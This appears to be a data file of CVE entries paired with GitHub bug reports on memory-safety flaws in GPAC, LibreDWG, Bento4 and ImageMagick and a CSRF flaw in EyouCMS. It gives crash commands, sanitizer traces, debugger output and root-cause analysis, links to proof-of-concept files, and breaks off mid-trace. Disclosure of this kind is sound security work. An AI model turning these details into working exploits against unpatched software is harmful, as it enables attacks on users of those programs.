A heap-buffer-overflow had occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490, as demonstrated by MP4Box. This vulnerability was fixed in commit fef6242.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2218" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2218
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description** A heap-buffer-overflow has occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490 when running program MP4Box,this can reproduce on the lattest commit. **version info** ``` fuzz@ubuntu:~/gpac2.1/gpac/bin/gcc$ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **crash command** ` ./MP4Box -info poc1` **crash output** ``` [iso file] Unknown box type 00000200 in parent stsd # Movie Info - 1 track - TimeScale 1000 Duration 00:00:10.000 (recomputed 4 Days, 14:43:47.879) Fragmented: no Major Brand mp4@ - version 0 - compatible brands: mp42 mp41 isom iso2 Created: GMT Thu Apr 26 09:02:13 2012 # Track 1 Info - ID 1 - TimeScale 3000 Media Duration 00:00:10.000 (recomputed 4 Days, 14:43:47.879) Track flags: Enabled In Movie In Preview Media Info: Language "Undetermined (und)" - Type "vide:00000200" - 300 samples Visual Sample Entry Info: width=320 height=240 (depth=24 bits) Visual Track layout: x=0 y=0 width=320 height=240 ================================================================= ==2235126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f000000130 at pc 0x7ff2a69b3bc0 bp 0x7fff43da89f0 sp 0x7fff43da89e0 READ of size 8 at 0x60f000000130 thread T0 #0 0x7ff2a69b3bbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490 #1 0x56165102107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862 #2 0x56165102ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994 #3 0x561651002ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367 #4 0x7ff2a4071082 in __libc_start_main ../csu/libc-start.c:308 #5 0x561650fd7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd) Address 0x60f000000130 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get Shadow bytes around the buggy address: 0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa =>0x0c1e7fff8020: fa fa fa fa fa fa[fa]fa fa fa fa fa fa fa fa fa 0x0c1e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2235126==ABORTING ``` **source code** ``` 2481 GF_DOVIDecoderConfigurationRecord *gf_isom_dovi_config_get(GF_ISOFile* the_file, u32 trackNumber, u32 DescriptionIndex) 2482 { 2483 GF_TrackBox* trak; 2484 GF_MPEGVisualSampleEntryBox *entry; 2485 trak = gf_isom_get_track_from_file(the_file, trackNumber); 2486 if (!trak || !trak->Media || !DescriptionIndex) return NULL; 2487 entry = (GF_MPEGVisualSampleEntryBox*)gf_list_get(trak->Media->information->sampleTable->SampleDescription->child_boxes, DescriptionIndex - 1); 2488 if (!entry) return NULL; 2489 if (entry->internal_type != GF_ISOM_SAMPLE_ENTRY_VIDEO) return NULL; 2490 if (!entry->dovi_config) return NULL; /**here**/ 2491 return DOVI_DuplicateConfig(&entry->dovi_config->DOVIConfig); 2492 } ``` **sample poc:** [poc1.zip](https://github.com/gpac/gpac/files/9038477/poc1.zip) ps: it is similar with the issue which occured in older gpac version ( https://github.com/gpac/gpac/issues/1846) . The bug was not patched . It still occured in the newest version.
heap-buffer-overflow in function gf_isom_dovi_config_get
https://api.github.com/repos/gpac/gpac/issues/2218/comments
0
2022-07-04T10:10:00Z
2022-07-12T17:13:10Z
https://github.com/gpac/gpac/issues/2218
1,292,941,893
2,218
CVE-2022-35164
2022-08-18T05:15:07.603
LibreDWG v0.12.4.4608 & commit f2dea29 was discovered to contain a heap use-after-free via bit_copy_chain.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/497" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:*:*:*:*:*:*:*:*", "matchCriteriaId": "0A8152A2-6867-4B31-8F47-A1A655A49EFF", "versionEndExcluding": "0.12.4.4608", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/497
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
# Vulnerability description version: [0.12.4.4608](https://github.com/LibreDWG/libredwg/releases/tag/0.12.4.4608) & latest commit [f2dea29](https://github.com/LibreDWG/libredwg/commit/f2dea296a0a3bb16afdae8d2ca16749a617a4383) poc: [poc](https://github.com/0xdd96/PoC/raw/main/libredwg/UAF-bit_copy_chain) command: ./dwgrewrite poc **_This is similar to issue #364 and others, but it seems that the patch https://github.com/LibreDWG/libredwg/commit/e95cc1eea8744c40e298208679eda14039b9b5d3 has not fully fixed them._** Here is the trace reported by ASAN: ``` ==28024==ERROR: AddressSanitizer: heap-use-after-free on address 0x7ffff3b65800 at pc 0x5555564f67f6 bp 0x7fffffff6760 sp 0x7fffffff6750 READ of size 1 at 0x7ffff3b65800 thread T0 #0 0x5555564f67f5 in bit_read_RC libredwg/src/bits.c:317 #1 0x5555564f67f5 in bit_copy_chain libredwg/src/bits.c:3352 #2 0x555556105ec6 in obj_flush_hdlstream libredwg/src/encode.c:833 #3 0x555556105ec6 in dwg_encode_PLANESURFACE_private libredwg/src/dwg.spec:9150 #4 0x5555563a57df in dwg_encode_PLANESURFACE libredwg/src/dwg.spec:9136 #5 0x5555563a57df in dwg_encode_variable_type libredwg/src/classes.inc:247 #6 0x5555563ab3d0 in dwg_encode_add_object libredwg/src/encode.c:4432 #7 0x5555563c914c in dwg_encode libredwg/src/encode.c:2769 #8 0x55555575ca00 in dwg_write_file libredwg/src/dwg.c:429 #9 0x555555758a3f in main libredwg/programs/dwgrewrite.c:350 #10 0x7ffff726f0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #11 0x55555575924d in _start (libredwg/build-ASAN/dwgrewrite+0x20524d) 0x7ffff3b65800 is located 0 bytes inside of 208896-byte region [0x7ffff3b65800,0x7ffff3b98800) freed by thread T0 here: #0 0x7ffff7699ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe) #1 0x5555564f532c in bit_chain_alloc_size libredwg/src/bits.c:3046 #2 0x5555564f532c in bit_chain_alloc libredwg/src/bits.c:3062 #3 0x5555564f532c in bit_copy_chain libredwg/src/bits.c:3339 #4 0x1900000105 (<unknown module>) previously allocated by thread T0 here: #0 0x7ffff7699ffe in __interceptor_realloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10dffe) #1 0x5555564f396f in bit_chain_alloc_size libredwg/src/bits.c:3046 #2 0x5555564f396f in bit_chain_alloc libredwg/src/bits.c:3062 #3 0x31fff (<unknown module>) ``` # Vulnerability analysis When running to `bit_copy_chain`, both `dat->chain` and `tmp_dat->chain` point to `0x7ffff3b65800` (see the gdb output below). This will lead to use-after-free, since line 3339 calls `realloc`, which frees the chunk `0x7ffff3b65800`, and line 3352 ties to read from the freed chunk. Also note that the comment says `bit_copy_chain` *Copy the whole content of tmp_data to dat, and reset tmp_dat*, so why `dat->chain = tmp_dat->chain` in this PoC should be further investigated. https://github.com/LibreDWG/libredwg/blob/f2dea296a0a3bb16afdae8d2ca16749a617a4383/src/bits.c#L3333-L3360 ``` pwndbg> p *dat $6 = { chain = 0x7ffff3b65800, size = 208896, byte = 204890, bit = 6 '\006', opts = 1 '\001', version = R_2000, from_version = R_2004, fh = 0x0 } pwndbg> p *tmp_dat $10 = { chain = 0x7ffff3b65800, size = 208896, byte = 204882, bit = 6 '\006', opts = 1 '\001', version = R_2000, from_version = R_2004, fh = 0x0 } ```
Heap use-after-free still exists in the bit_copy_chain
https://api.github.com/repos/LibreDWG/libredwg/issues/497/comments
2
2022-06-17T12:04:26Z
2023-06-27T10:19:27Z
https://github.com/LibreDWG/libredwg/issues/497
1,274,949,181
497
CVE-2022-35165
2022-08-18T05:15:07.657
An issue in AP4_SgpdAtom::AP4_SgpdAtom() of Bento4-1.6.0-639 allows attackers to cause a Denial of Service (DoS) via a crafted mp4 input.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/712
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
# Vulnerability description **version:** Bento4-1.6.0-639 **command:** ./mp42aac $POC /dev/null **Download:** [poc](https://github.com/0xdd96/PoC/raw/main/Bento4/AP4_SgpdAtom::AP4_SgpdAtom-out-of-memory) Here is the trace reported by ASAN: ``` $ mp42aac poc /dev/null AddressSanitizer: Out of memory. The process has exhausted 65536MB for size class 48. ================================================================= ==29843==ERROR: AddressSanitizer: allocator is out of memory trying to allocate 0x18 bytes #0 0x7ffff769b947 in operator new(unsigned long) (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) #1 0x555555911f52 in AP4_List<AP4_DataBuffer>::Add(AP4_DataBuffer*) /path_to_Bento4/Source/C++/Core/Ap4List.h:160 #2 0x5555559114bd in AP4_SgpdAtom::AP4_SgpdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&) /path_to_Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:111 #3 0x555555910da4 in AP4_SgpdAtom::Create(unsigned int, AP4_ByteStream&) /path_to_Bento4/Source/C++/Core/Ap4SgpdAtom.cpp:54 #4 0x55555589399c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:729 #5 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #6 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #7 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #8 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #9 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #10 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #11 0x5555558c7b47 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84 #12 0x5555558c768b in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50 #13 0x555555892ccd in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:560 #14 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #15 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #16 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #17 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #18 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #19 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #20 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #21 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #22 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #23 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #24 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 #25 0x5555558b9c5f in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #26 0x5555558b96c2 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #27 0x5555558b9229 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /path_to_Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #28 0x555555893d26 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:796 #29 0x555555890224 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /path_to_Bento4/Source/C++/Core/Ap4AtomFactory.cpp:233 ==29843==HINT: if you don't care about these errors you may set allocator_may_return_null=1 SUMMARY: AddressSanitizer: out-of-memory (/lib/x86_64-linux-gnu/libasan.so.5+0x10f947) in operator new(unsigned long) ==29843==ABORTING ``` # Vulnerability analysis https://github.com/axiomatic-systems/Bento4/blob/0735fe81819fd5f6501e6649b6e0d4b2b7874d8f/Source/C%2B%2B/Core/Ap4SgpdAtom.cpp#L89-L114 ``` pwndbg> p entry_count $1 = 4278190081 pwndbg> p m_DefaultLength $2 = 20 pwndbg> p m_Version $3 = 1 '\001' pwndbg> p bytes_available $4 = 20 ``` The possible cause of this issue is that a crafted input can set `entry_count` to a large value (4,278,190,081) in line 90. Such a long loop (line 95-114) will allocate a lot of memory in line 106 and line 111, which eventually exhausts the memory. Since the return value of `stream.Read` is not checked in line 109, the loop will not terminate at the end of the input file.
Possible memory exhuastion in AP4_SgpdAtom::AP4_SgpdAtom(). The process has exhausted 65536MB memory.
https://api.github.com/repos/axiomatic-systems/Bento4/issues/712/comments
0
2022-05-31T14:44:43Z
2022-06-04T17:16:23Z
https://github.com/axiomatic-systems/Bento4/issues/712
1,253,977,287
712
CVE-2022-36225
2022-08-19T17:15:07.897
EyouCMS V1.5.8-UTF8-SP1 is vulnerable to Cross Site Request Forgery (CSRF) via the background, column management function and add.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.5.8:*:*:*:*:*:*:*", "matchCriteriaId": "82E421EB-ECC8-42A4-8384-4187474D1AC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/weng-xianhu/eyoucms/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
version:V1.5.8-UTF8-SP1 ![image](https://user-images.githubusercontent.com/60609675/179399541-843e2a44-61d4-47b1-a174-97e975e03452.png) In the background, column management function and add. ![image](https://user-images.githubusercontent.com/60609675/179399615-1abe143b-0165-43f6-8738-7d16c06c1637.png) Add test data and capture packets. ![image](https://user-images.githubusercontent.com/60609675/179399634-59449baa-e24e-4d7a-84e5-9ca0293f7e36.png) ![image](https://user-images.githubusercontent.com/60609675/179399670-c697287e-cb05-410c-8521-4f4e84783ff0.png) use CSRF poc,and drop the packets. ![image](https://user-images.githubusercontent.com/60609675/179399733-a6562ba4-8d4a-441d-8637-fe7f3a45e3fd.png) dorp the packets and submit. ![image](https://user-images.githubusercontent.com/60609675/179399776-e4475f20-9970-476b-9ac4-16d9b6436654.png) ![image](https://user-images.githubusercontent.com/60609675/179399794-2b8dc544-d6d7-43b5-b957-2e65bf0be254.png) See test added. ![image](https://user-images.githubusercontent.com/60609675/179399839-db85f945-909f-4282-a965-b71d70104902.png)
EyouCMS v1.5.8 has a vulnerability, Cross-site request forgery(CSRF)
https://api.github.com/repos/weng-xianhu/eyoucms/issues/26/comments
2
2022-07-17T13:08:03Z
2023-02-28T08:54:23Z
https://github.com/weng-xianhu/eyoucms/issues/26
1,307,093,003
26
CVE-2021-3574
2022-08-26T16:15:08.943
A vulnerability was found in ImageMagick-7.0.11-5, where executing a crafted file with the convert command, ASAN detects memory leaks.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "LOW", "baseScore": 3.3, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/c6ad94fbb7b280f39c2fbbdc1c140e51b1b466e9" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/3540" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/cd7f9fb7751b0d59d5a74b12d971155caad5a792" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00008.html" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4Q6MJAMGHGB552KSFTQKXEKJVQNM4MCT/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5C6XAGUFPUF4SNVCI2T4OJK3EFIENBGP/" }, { "source": "secalert@redhat.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LNVDNM4ZEIYPT3SLZHPYN7OG4CZLEXZJ/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.11-5:*:*:*:*:*:*:*", "matchCriteriaId": "3769F997-3EBC-4222-B3D4-8709A7AA49FE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/3540
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites I have written a descriptive issue title I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported I have verified that I am using the latest version of ImageMagick ### ImageMagick version 7.0.11-5 ### Operating system Linux ### Operating system, version and so on Ubuntu 18.04, 64bit ### Description When we execute the convert command, asan reports the error LeakSanitizer: detected memory leaks. ### Steps to Reproduce ## Command please run a following cmd with poc file. [POC](https://github.com/NISL-SecurityGroup/NISL-BugDetection/blob/main/project/ImageMagick/memory_leaks/magick-memory_leaks) ```$ magick convert $poc out.bmp``` ## Result Here's ASAN report: ``` convert: Invalid TIFF directory; tags are not sorted in ascending order. `TIFFReadDirectoryCheckOrder' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 4096 (0x1000) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Nonstandard tile width 17990, convert file. `id:000006,sig:09,src:000052,time:16507786,op:flip1,pos:23' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 29255 (0x7247) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 63745 (0xf901) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: Unknown field with tag 0 (0x0) encountered. `TIFFReadDirectory' @ warning/tiff.c/TIFFWarnings/960. convert: IO error during reading of "Tag 4096"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: ASCII value for tag "DocumentName" contains null byte in value; value incorrectly truncated during reading due to implementation limitations. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Incorrect count for "XResolution"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Incorrect count for "YResolution"; tag ignored. `TIFFFetchNormalTag' @ warning/tiff.c/TIFFWarnings/960. convert: Sum of Photometric type-related color channels and ExtraSamples doesn't match SamplesPerPixel. Defining non-color channels as ExtraSamples.. 